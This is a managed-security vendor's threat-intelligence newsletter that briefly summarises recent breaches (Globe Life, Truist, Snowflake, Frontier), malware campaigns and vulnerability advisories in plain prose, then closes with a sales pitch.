Welcome to Ntirety's Threat Intelligence Summary, where our elite Security and Threat Response Team delivers critical insights and expert analysis. Each report highlights the most pressing cyber threats and vulnerabilities currently active, to educate and raise awareness among our partners, customers, and the broader community. Committed to securing mission-critical data, Ntirety's managed security services proactively monitor and combat these threats to ensure the safety of our customers.
- Globe Life:
American financial services holding company Globe Life says attackers may have accessed consumer and policyholder data after breaching one of its web portals. At this time, the company believes the issue is specific to the one portal and all other systems remain operational.
- Truist Bank:
U.S. commercial bank Truist confirmed its systems were breached in an October cyberattack after a threat actor posted some of the company’s data for sale on a hacking forum.
- Snowflake Update:
As many as 165 customers of Snowflake are said to have had their information potentially exposed as part of an ongoing campaign designed to facilitate data theft and extortion. The threat actor, UNC5537, is a financially motivated threat actor that is systematically compromising Snowflake customers using stolen credentials in order to advertise the victim’s data for sale on cybercrime forums and attempt to extort the victims.
- Frontier Communications:
Frontier Communications is warning 750,000 customers that their information was exposed in a data breach after an April cyberattack claimed by the Ransom Hub ransomware operation. The telecommunications provider says it suffered a cyber-attack in mid-April that allowed hackers to access customers’ personal information.
- The New York Times:
Internal source code and data belonging to The New York Times was leaked on the 4chan message board after being stolen from the company’s GitHub repositories in January 2024. The internal data was leaked on Thursday by an anonymous user who posted a torrent to a 273 GB archive containing the stolen data.
- Arid Viper:
The threat actor known as Arid Viper has been attributed to a mobile espionage campaign that leverages trojanized Android apps to deliver a spyware strain dubbed AridSpy. The malware is distributed through dedicated websites impersonating various messaging apps, a job opportunity app, and a Palestinian Civil Registry app.
- Sleepy Pickle:
The security risks posed by the Pickle format have once again come to the fore with the discovery of a new hybrid machine learning model exploitation technique. The attack method weaponizes the ubiquitous format used to package and distribute machine learning models to corrupt the model itself.
- NoodleRAT:
A previously undocumented cross-platform malware codenamed NoodleRAT has been put to use by Chinese-speaking threat actors. Noodle RAT, which also goes by the name ANGRYREBEL, comes in both Windows and Linux variants. Both versions share identical code for C2 and use similar configuration formats.
- SSLoad:
The malware known as SSLoad is being delivered by means of a previously undocumented loader called PhantomLoader. The loader is added to a legitimate DLL by binary patching the file and employing self- modifying techniques to evade detection.
- Operation Celestial Force:
Threat actors with ties to Pakistan have been linked to a long-running malware campaign. The activity entails the use of an Android malware called Gravity RAT and a Windows-based malware loader codenamed HeavyLift.
- Windows Search Protocol:
A new phishing campaign uses HTML attachments that abuse the Windows search protocol to push batch files hosted on remote servers that deliver malware. It is possible to force Windows Search to query file shares on remote hosts and use a custom title for the search window, and this can be exploited to share malicious files on remote servers.
- SecShow
: Researchers have revealed more information on a Chinese actor codenamed SecShow that has been observed conducting DNS on a global scale since June 2023.
- Patch Tuesday:
Microsoft has released security updates to address 51 flaws as part of its June Patch Tuesday. Of the 51 vulnerabilities, there was one rated critical and 50 rated important. At this time none of the security flaws have been actively exploited.
- Fortinet:
Fortinet addressed multiple vulnerabilities in FortiOS and other products. The flaws addressed include code execution flaws, stack-based buffer overflow vulnerabilities, and a cross site scripting vulnerabilities.
- Fortinet:
State-sponsored threat actors backed by China gained access to 20,000 Fortinet FortiGate systems by exploiting a known critical security flaw (CVE-2022-42475). The campaign targeted dozens of Western governments, international organizations, and a large number of companies within the defense industry.
- WARMCOOKIE:
Researchers have disclosed details of an ongoing phishing campaign that leverages recruiting and job themed lures to deliver a Windows-based backdoor named WARMCOOKIE. WARMCOOKIE appears to be an initial backdoor tool used to scout out the victims’ networks and deploy additional payloads.
- Black Basta:
Threat actors linked to the Black Basta ransomware may have exploited a recently disclosed privilege escalation flaw in the Microsoft Windows Error Reporting Service. The flaw (CVE-2024026169) is an elevation of privilege bug in the Windows Error Reporting Service that could be exploited to achieve SYSTEM privileges. This flaw was patched in March 2024.
- More_eggs:
Researchers have spotted a phishing attack distributing More_eggs malware by masquerading it as a resume. More_eggs is a modular backdoor capable of harvesting sensitive information that is believed to be the work of the threat actor known as Golden Chickens.
- ValleyRAT:
Researchers have uncovered an updated version of malware called ValleyRAT that’s being distributed as part of a new campaign. The latest version of ValleyRAT introduced new commands, such as capturing screen shots, process filtering, forced shutdown, and clearing Windows event logs.
- Arm:
Arm has issued a security bulletin warning of a memory-related vulnerability in Bifrost and Valhall GPU kernel drivers that is being exploited in the wild. The issue (CVE-2024-4610) is a use-after-free vulnerability that impacts all version of Bifrost and Valhall drivers from r34po through r40po.?
- Veeam:
A PoC exploit for a Veeam Backup Enterprise Manager authentication bypass flaw (CVE-2024-29849) is now publicly available, making it urgent that admins apply the latest security updates. Veeam issued a security bulletin about the critical flaw in May, but the exploit is now publicly available making it more urgent to upgrade to VBEM version 12.1.2.172.
- Netgear:
Researchers have found half a dozen vulnerabilities of varying severity impacting Netgear WNR614 N300. The device reached EOL by Netgear but it is still present in many environments due to its reliability, ease of use, and performance. Netgear is not expected to release security updates for the vulnerabilities and replacing the devices with a supported model is suggested.
- DDoS:
Hacktivists are conducting DDoS attacks on European political parties that represent and promote strategies opposing their interests. Cloudflare reports that it has mitigated at least 3 DDoS attack waves on various election-related sites in the Netherlands.
- Sticky Werewolf:
Researchers have disclosed details of a threat actor known as Sticky Werewolf that has been linked to cyber-attacks targeting entities in Russia and Belarus. The phishing attacks were aimed at a pharmaceutical company this time around. In previous campaigns the infection chain began with phishing emails containing a link to download a malicious file from flatforms like gofile.io
, but this latest campaign used archive files containing LNK files pointing to a payload stored on WebDAV servers.
- LightSpy:
Researchers have disclosed that the LightSpy spyware recently identified as targeting Apple iOS users is in fact a previously undocumented macOS variant of the implant. The threat actor group used two publicly available exploits (CVE-2018-4233, CVE-2018-4404) to deliver implants for macOS.
- EmailGPT:
A critical security flaw has been reported in EmailGPT. The vulnerability (CVE-2024-5184) is known as prompt injection and enables malicious actors to manipulate the service, therefore potentially leading to the compromise of sensitive data.
Concerned about the security of your network, systems, applications, or data? Given the ever-growing list of cyber threats, your concerns are justified.
For over 25 years, Ntirety has been at the forefront of helping organizations anticipate and stay protected from both known and emerging cyber threats. Contact us
to discover how our proactive managed security services can strengthen your organization's security posture and provide peace of mind.?
